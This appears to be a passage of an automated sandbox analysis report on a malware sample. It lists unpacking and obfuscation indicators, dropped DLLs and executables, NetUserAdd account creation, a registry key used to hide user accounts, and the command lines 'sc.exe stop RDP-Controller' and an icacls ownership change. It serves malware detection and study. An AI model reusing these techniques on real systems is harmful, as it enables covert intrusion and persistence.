Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdb source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.2781145830.000000003B860000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.2776697381.000000002F98F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\BFCAAEHJDB.exe

Unpacked PE file: 6.2.BFCAAEHJDB.exe.3370000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Binary contains a suspicious time stamp

Source: rfxvmt.dll.23.dr

Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00417A40

PE file contains an invalid checksum

Source: vcruntime140.dll.0.dr

Static PE information: real checksum: 0x16dd4 should be: 0x13f4f

PE file contains sections with non-standard names

Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: BFCAAEHJDB.exe.0.dr	Static PE information: section name: .didata
Source: 7847438767[1].exe.0.dr	Static PE information: section name: .didata
Source: euasv89vr56qz5toefmgc1.exe.7.dr	Static PE information: section name: .xdata
Source: main.exe.14.dr	Static PE information: section name: .xdata
Source: evtsrv.dll.23.dr	Static PE information: section name: .xdata
Source: termsrv32.dll.23.dr	Static PE information: section name: .xdata
Source: rdpctl.dll.23.dr	Static PE information: section name: .xdata
Source: samctl.dll.23.dr	Static PE information: section name: .xdata
Source: prgmgr.dll.23.dr	Static PE information: section name: .xdata
Source: dwlmgr.dll.23.dr	Static PE information: section name: .xdata
Source: cnccli.dll.23.dr	Static PE information: section name: .xdata
Source: libi2p.dll.23.dr	Static PE information: section name: .xdata
Source: S7evpAMe.23.dr	Static PE information: section name: .xdata
Source: g29qQU9G.23.dr	Static PE information: section name: .xdata
Source: h0yu5TYE.23.dr	Static PE information: section name: .xdata
Source: Lx9RtFcl.23.dr	Static PE information: section name: .xdata
Source: fJw4qvYl.23.dr	Static PE information: section name: .xdata
Source: FHLBnhuN.23.dr	Static PE information: section name: .xdata
Source: 1kuzcKGx.23.dr	Static PE information: section name: .xdata
Source: KXEmxT2p.23.dr	Static PE information: section name: .xdata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041CDD5 push ecx; ret	0_2_0041CDE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81B536 push ecx; ret	0_2_6C81B549
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03326575 push esi; ret	6_2_03326577
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72E8 push rsp; ret	23_2_00007FFDA38D72E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72E4 push rsp; ret	23_2_00007FFDA38D72E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72E0 push rsp; ret	23_2_00007FFDA38D72E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D727C push rsp; ret	23_2_00007FFDA38D727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D726F push qword ptr [rsi]; ret	23_2_00007FFDA38D7275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72BC push rsp; ret	23_2_00007FFDA38D72BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72B8 push rsp; ret	23_2_00007FFDA38D72B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72DC push rsp; ret	23_2_00007FFDA38D72DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72D8 push rsp; ret	23_2_00007FFDA38D72D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72D4 push rsp; ret	23_2_00007FFDA38D72D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72D0 push rsp; ret	23_2_00007FFDA38D72D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72CC push rsp; ret	23_2_00007FFDA38D72CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72C4 push rsp; ret	23_2_00007FFDA38D72C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79F7 push qword ptr [00007FFDD98D78C8h]; retf	23_2_00007FFDA38D79FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79EF push qword ptr [00007FFDD98D78C0h]; retf	23_2_00007FFDA38D79F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79E7 push qword ptr [00007FFDD98D78B8h]; retf	23_2_00007FFDA38D79ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D7A17 push qword ptr [00007FFDAA8D78E8h]; retf	23_2_00007FFDA38D7A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D7A0F push qword ptr [00007FFDD98D78E0h]; retf	23_2_00007FFDA38D7A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D7A07 push qword ptr [00007FFDD98D78D8h]; retf	23_2_00007FFDA38D7A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79FF push qword ptr [00007FFDD98D78D0h]; retf	23_2_00007FFDA38D7A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79BB push qword ptr [00007FFDD98D788Ch]; retf	23_2_00007FFDA38D79C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79B3 push qword ptr [00007FFDD98D7884h]; retf	23_2_00007FFDA38D79B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79D3 push qword ptr [00007FFDD98D78A4h]; retf	23_2_00007FFDA38D79D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79CB push qword ptr [00007FFDD98D789Ch]; retf	23_2_00007FFDA38D79D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79C3 push qword ptr [00007FFDD98D7894h]; retf	23_2_00007FFDA38D79C9

Contains functionality to create new users

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FFDA389875B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,

23_2_00007FFDA389875B

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\7847438767[1].exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\S7evpAMe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\KXEmxT2p	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\h0yu5TYE	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\1kuzcKGx	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\fJw4qvYl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\FHLBnhuN	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\feJ0dymt	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\g29qQU9G	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Lx9RtFcl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\ProgramData\BFCAAEHJDB.exe	File created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\BFCAAEHJDB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\BFCAAEHJDB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\g29qQU9G	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\S7evpAMe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Lx9RtFcl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\KXEmxT2p	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\h0yu5TYE	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\1kuzcKGx	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\fJw4qvYl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\FHLBnhuN	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\feJ0dymt	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\S7evpAMe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\g29qQU9G	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\feJ0dymt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\h0yu5TYE	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Lx9RtFcl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\fJw4qvYl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\FHLBnhuN	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\1kuzcKGx	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\KXEmxT2p	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF620941DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF620941DBC

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000017.00000002.3443178885.00007FFDA38A4000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.3443178885.00007FFDA38A4000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: Lx9RtFcl.23.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Lx9RtFcl.23.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00417A40

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Uses cacls to modify the permissions of files

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
